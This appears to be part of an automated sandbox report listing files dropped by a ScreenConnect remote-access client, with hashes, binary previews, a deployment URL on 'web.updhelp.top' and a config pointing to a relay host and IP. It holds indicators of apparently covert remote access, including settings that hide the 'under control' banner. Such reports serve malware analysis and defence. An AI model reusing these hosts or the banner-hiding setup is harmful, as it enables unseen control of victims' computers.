                                                                                                                  SHA-512:8D52B6FB173714F026DF687064A20F42AC7C016FF9E41E941737D3A5159A0027D5ACF420BC03F5BCDE59CDB21586A77E491DF26528B87B550E880CF7AB8A3929
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*.^..........." ..0.................. ... ....... .......................`.......P....@.................................A...O.... ..|....................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...|.... ......................@..@.reloc.......@......................@..B................u.......H...........4............_...... .........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..

                                                                                                                  C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\1e4eslwm.newcfg

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exe
                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):565
                                                                                                                  Entropy (8bit):5.05447022478102
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENO85xrg0e/vXbAa3xT:2dL9hK6E46YP6kvH
                                                                                                                  MD5:925902CE70050484BDE1EC7E4EC2B4CE
                                                                                                                  SHA1:369FAF8C71F589F183DEA25B3332369DB48B1CD1
                                                                                                                  SHA-256:41170994C6D95B53CA8A58AD9046652EA502F5AF949D7DB8E775DC2F0B0ECE04
                                                                                                                  SHA-512:61F9E0EC4C8E1D7F17451300A137F3A094614BC8FE359EAB354F6724AB8CC6B895774245965E8A6D675A46937152735CD22B249246F99D1713793913B39DCACC
                                                                                                                  Malicious:false
                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>pilwerui.rchelp.top=217.156.123.36-12%2f04%2f2025%2015%3a58%3a19</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                                                  C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\Client.Override.en-US.resources

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):602
                                                                                                                  Entropy (8bit):4.562429137633411
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:rHy2DLI4MWonY6c/KItfU49cAjUPDLm184c7eAr5TlO5FMDpyp+HIR:zHE4rbM2xjU7M8LDVTlcFqxIR
                                                                                                                  MD5:7D673068F90BDA9E41FD7C1ED00561B1
                                                                                                                  SHA1:EE730D9CA6C95F650CDD2E9A40DB0CCA09779FE2
                                                                                                                  SHA-256:9A879C42D9FD0F787CFD9FD50395098FD55514DE4C5B8C87C929393A554F87D2
                                                                                                                  SHA-512:612F7CBA018C5B03CE63B5DC9860B5995A71B61CAE74BAF3EC9D99C0FF127BE8C6772BD7C872AFCBA435B6C56A21C163FA3D9E00288FC1D4AA58E5F767A4F4C5
                                                                                                                  Malicious:false
                                                                                                                  Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP....4..2...n_Q2T}........Z...5...........0A.p.p.l.i.c.a.t.i.o.n.D.i.r.e.c.t.o.r.y.N.a.m.e..... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.....2B.l.a.n.k.M.o.n.i.t.o.r.M.e.s.s.a.g.e.F.o.r.m.a.t.....RE.n.d.P.o.i.n.t.S.t.a.t.u.s.S.l.e.e.p.i.n.g.F.o.r.F.r.e.e.L.i.c.e.n.s.e.T.i.t.l.e.....FS.e.s.s.i.o.n.I.n.v.a.l.i.d.S.e.s.s.i.o.n.D.e.l.e.t.e.d.M.e.s.s.a.g.e.B.....Support..Support...,Not enough data receiving from host computer..Removed

                                                                                                                  C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\Client.Override.resources

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):36726
                                                                                                                  Entropy (8bit):6.970306100142409
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:768:V4Bsj4Bsj4Bsj4Bsj4Bsj4Bsj4Bsj4Bs2xCReSHf580:V4Bsj4Bsj4Bsj4Bsj4Bsj4Bsj4Bsj4BE
                                                                                                                  MD5:1E08571FBC8357404A32596163E2176D
                                                                                                                  SHA1:0277120E769801FF9B6E280010247ABD76B5E339
                                                                                                                  SHA-256:D2311141462BCBF68B2E19D2581307D7E4B384CB34E78C32E4A8CF56FE1BDFEB
                                                                                                                  SHA-512:3CC63D36920E981661595A262FF27120FC909D61BFA5D47DC47AF1D2CD55ECB93EE7B244E144EE87647031361491722E7163F8CE8EB95A7120840EE518367AD1
                                                                                                                  Malicious:false
                                                                                                                  Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADPJ........jF.1P)...H..../._.ks`.k.`.k.M6p....b.......'...............w.......P...1...-..."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6..'..(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2..1..0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2..;..,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6..E..6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.xO..6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e..O..DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.C... .....PNG........IHDR...-...-.....:......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs...:...:..d.J...NIDATX...{pT.......$\..................h.m

                                                                                                                  C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\Client.en-US.resources

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):50133
                                                                                                                  Entropy (8bit):4.759054454534641
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                                                                  MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                                                                  SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                                                                  SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                                                                  SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                                                                  Malicious:false
                                                                                                                  Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..*v.......B....A...a......D..c..w..K,..t...S.....*v....7.6|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...

                                                                                                                  C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\Client.resources

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):26722
                                                                                                                  Entropy (8bit):7.7401940386372345
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                                                                  MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                                                  SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                                                  SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                                                  SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                                                  Malicious:false
                                                                                                                  Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.

                                                                                                                  C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\app.config

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exe
                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):3343
                                                                                                                  Entropy (8bit):4.771733209240506
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHlHgHyHNHtH29PtxA2oFHX:opPN
                                                                                                                  MD5:9322751577F16A9DB8C25F7D7EDD7D9F
                                                                                                                  SHA1:DC74AD5A42634655BCBA909DB1E2765F7CDDFB3D
                                                                                                                  SHA-256:F1A3457E307D721EF5B63FDB0D5E13790968276862EF043FB62CCE43204606DF
                                                                                                                  SHA-512:BB0C662285D7B95B7FAA05E9CC8675B81B33E6F77B0C50F97C9BC69D30FB71E72A7EAF0AFC71AF0C646E35B9EADD1E504A35D5D25847A29FD6D557F7ABD903AB
                                                                                                                  Malicious:false
                                                                                                                  Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa

                                                                                                                  C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\user.config (copy)

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exe
                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):565
                                                                                                                  Entropy (8bit):5.05447022478102
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENO85xrg0e/vXbAa3xT:2dL9hK6E46YP6kvH
                                                                                                                  MD5:925902CE70050484BDE1EC7E4EC2B4CE
                                                                                                                  SHA1:369FAF8C71F589F183DEA25B3332369DB48B1CD1
                                                                                                                  SHA-256:41170994C6D95B53CA8A58AD9046652EA502F5AF949D7DB8E775DC2F0B0ECE04
                                                                                                                  SHA-512:61F9E0EC4C8E1D7F17451300A137F3A094614BC8FE359EAB354F6724AB8CC6B895774245965E8A6D675A46937152735CD22B249246F99D1713793913B39DCACC
                                                                                                                  Malicious:false
                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>pilwerui.rchelp.top=217.156.123.36-12%2f04%2f2025%2015%3a58%3a19</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                                                  C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..vice_4b14c015c87c1ad8_0018.0004_none_04f4a774935ed06c\ScreenConnect.ClientService.dll

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):68608
                                                                                                                  Entropy (8bit):6.065078337244406
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:xQZMEtZ8j8Mk6Y6lXQiA1FFwtc5QFVIl1D5FYb82:yb2jbfZUFCMQFVQR2
                                                                                                                  MD5:FFEDBAC44FE3AF839D5AE3C759806B2C
                                                                                                                  SHA1:71E48C88DFFFE49C1C155181E760611C65F6CA50
                                                                                                                  SHA-256:42E0ADD27D20E2393F9793197798AC7D374812A6DCD290B153F879A201E546AF
                                                                                                                  SHA-512:533D9284C15C2B0BF4B135FC7E55A04139D83065282FD4AF54866B8B2B6966A0989D4ECF116B89A9B82D028EF446986AA1B92BB07B1521B1AEF15BA286B75358
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.............."... ...@....... ..............................|.....@..................................!..O....@.......................`.......!..8............................................ ............... ..H............text...@.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................!......H.......po..,.................... ........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....f...s....%.,...(...+*vs....%.}P.........s....(....*....0..&........s....}.....s....}...........}....s.......}R......{R...(#.....}Q.....}.....(....&.(&..........s....o.....(&...~-...%-.&~+.....g...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s:...}....... ..6........s....s:...}.....($..

                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KA259YPD\PFI5AX1V.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (617), with CRLF line terminators
                                                                                                                  Category:modified
                                                                                                                  Size (bytes):14764
                                                                                                                  Entropy (8bit):3.8054152309692824
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:tPB/ZTdxvlW+vXvBBaOy0l3qTdxvl1ju93J/58Zk1FXTdxvl6kMaudPL5oIZLNoA:VDfaOybu95tfiWLEv
                                                                                                                  MD5:F3A64CEFB68829DDFDB45E29B416A857
                                                                                                                  SHA1:5C980071B7CCF96BC41A204D0BBD52DE19153691
                                                                                                                  SHA-256:D28CF9C6C7AEF4918B91826D799702799F021DFBAAAE98FD46AA264C7BA22BD2
                                                                                                                  SHA-512:B69B4D9367AD963C885E4206D46BFD65F23B340D71EE6854F1E391082248AA51817262C81B2126F6DA3D9ED77F14B76BD88304EFF8600E35EEF0FE8169430213
                                                                                                                  Malicious:false
                                                                                                                  Preview:..P.L.A.T.F.O.R.M. .V.E.R.S.I.O.N. .I.N.F.O.......W.i.n.d.o.w.s. .......:. .1.0...0...2.2.6.3.1...0. .(.W.i.n.3.2.N.T.).......C.o.m.m.o.n. .L.a.n.g.u.a.g.e. .R.u.n.t.i.m.e. ...:. .4...0...3.0.3.1.9...4.2.0.0.0.......S.y.s.t.e.m...D.e.p.l.o.y.m.e.n.t...d.l.l. .....:. .4...8...9.1.7.6...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.1.R.E.L.1.L.A.S.T._.B.......c.l.r...d.l.l. .......:. .4...8...9.2.8.2...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.1.R.E.L.1.L.A.S.T._.C.......d.f.d.l.l...d.l.l. .......:. .4...8...9.1.7.6...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.1.R.E.L.1.L.A.S.T._.B.......d.f.s.h.i.m...d.l.l. .......:. .1.0...0...2.2.6.2.1...3.0.0.0.0. .(.W.i.n.B.u.i.l.d...1.6.0.1.0.1...0.8.0.0.).........S.O.U.R.C.E.S.......D.e.p.l.o.y.m.e.n.t. .u.r.l.......:. .h.t.t.p.s.:././.w.e.b...u.p.d.h.e.l.p...t.o.p./.B.i.n./.S.c.r.e.e.n.C.o.n.n.e.c.t...C.l.i.e.n.t...a.p.p.l.i.c.a.t.i.o.n.?.e.=.S.u.p.p.o.r.t.&.y.=.G.u.e.s.t.&.h.=.p.i.l.w.e.r.u.i...r.c.h.e.l.p...t.o.p.&.p.=.8.8.8.0.&.s.=.5.7.7.c.f.c.5.4.-.8.2.b.0.-.4.7.7.7.-.8.

                                                                                                                  C:\Users\user\AppData\Local\Temp\Deployment\961RLHCX.ZKZ\X9NQ8ZH0.YE4.application

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63849), with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):168849
                                                                                                                  Entropy (8bit):5.58055802513129
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3072:mNYcT51/FXvMVNWfCXq9ymlrpErpErpBm2o9HuzhJOvP:hcfiVI3rpErpErpBmt8vOvP
                                                                                                                  MD5:9AC4954D33E063FDEF5236004D57442E
                                                                                                                  SHA1:41A208DBB7952BBDA3714F369BBC5110FFC911C2
                                                                                                                  SHA-256:CE37639F366DA772331216865047D422F00A6B0BC46BE4FDB7F0E151DF0D0DA9
                                                                                                                  SHA-512:1DDBADE960AA3F2AEF0B939BAFB919D71586500B8EA2BCEE07C8F39EF2390A784C78EC0A4AD3F7C3936D6C22331B77FE2921DE447542502DD559DF2CE8D91B59
                                                                                                                  Malicious:false
                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.4.4.9118" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tru

                                                                                                                  C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.Client.dll

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):197120
                                                                                                                  Entropy (8bit):6.586596996537647
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3072:NxLtNGBlIyS7/OTjusqVFJRJcyzvzqSmzDvJXY3:HtNGBGySaTqPJYEqSmG
                                                                                                                  MD5:FF388E261FCB88BB2FB4295B4E84BE66
                                                                                                                  SHA1:622E9B646881E4606A9A82D06E48329CFEBE83AA
                                                                                                                  SHA-256:8872211A8F4FF520D9D3342ED3841EB6FE42F6D83A0F639F6BAF84795DA99DE2
                                                                                                                  SHA-512:8D52B6FB173714F026DF687064A20F42AC7C016FF9E41E941737D3A5159A0027D5ACF420BC03F5BCDE59CDB21586A77E491DF26528B87B550E880CF7AB8A3929
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*.^..........." ..0.................. ... ....... .......................`.......P....@.................................A...O.... ..|....................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...|.... ......................@..@.reloc.......@......................@..B................u.......H...........4............_...... .........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..

                                                                                                                  C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.Client.dll.genman

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1039
                                                                                                                  Entropy (8bit):5.143873637965305
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:MMHdF4XZ8i9o9olxbv5NEgVkP0A4cR7vNxW57FpS+iENg49vNxW5NgM4HNg49vNx:JdFYZ8h9onRigeP0AOvSkcyMkcVSkTo
                                                                                                                  MD5:9352EE4250503E5C30608C0A93401FB3
                                                                                                                  SHA1:1089226EFE4E5FDDDD76364542ED4198D37C5C11
                                                                                                                  SHA-256:EC8825166E99A8A53E505EFAC5D683714BA4CA8EE90567C18B5A85A87FED235E
                                                                                                                  SHA-512:B7C236642F7A5288231D098C288FD44DEA579EAC1B05C4CE188E6AE9F93B10E5152A999DF00BCE8315B882C57D89DA6179EB97746B02BE58DDD280501F18B7C0
                                                                                                                  Malicious:false
                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.4.4.9118" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.4.4.9118" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependent

                                                                                                                  C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.ClientService.dll

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):68608
                                                                                                                  Entropy (8bit):6.065078337244406
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:xQZMEtZ8j8Mk6Y6lXQiA1FFwtc5QFVIl1D5FYb82:yb2jbfZUFCMQFVQR2
                                                                                                                  MD5:FFEDBAC44FE3AF839D5AE3C759806B2C
                                                                                                                  SHA1:71E48C88DFFFE49C1C155181E760611C65F6CA50
                                                                                                                  SHA-256:42E0ADD27D20E2393F9793197798AC7D374812A6DCD290B153F879A201E546AF
                                                                                                                  SHA-512:533D9284C15C2B0BF4B135FC7E55A04139D83065282FD4AF54866B8B2B6966A0989D4ECF116B89A9B82D028EF446986AA1B92BB07B1521B1AEF15BA286B75358
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
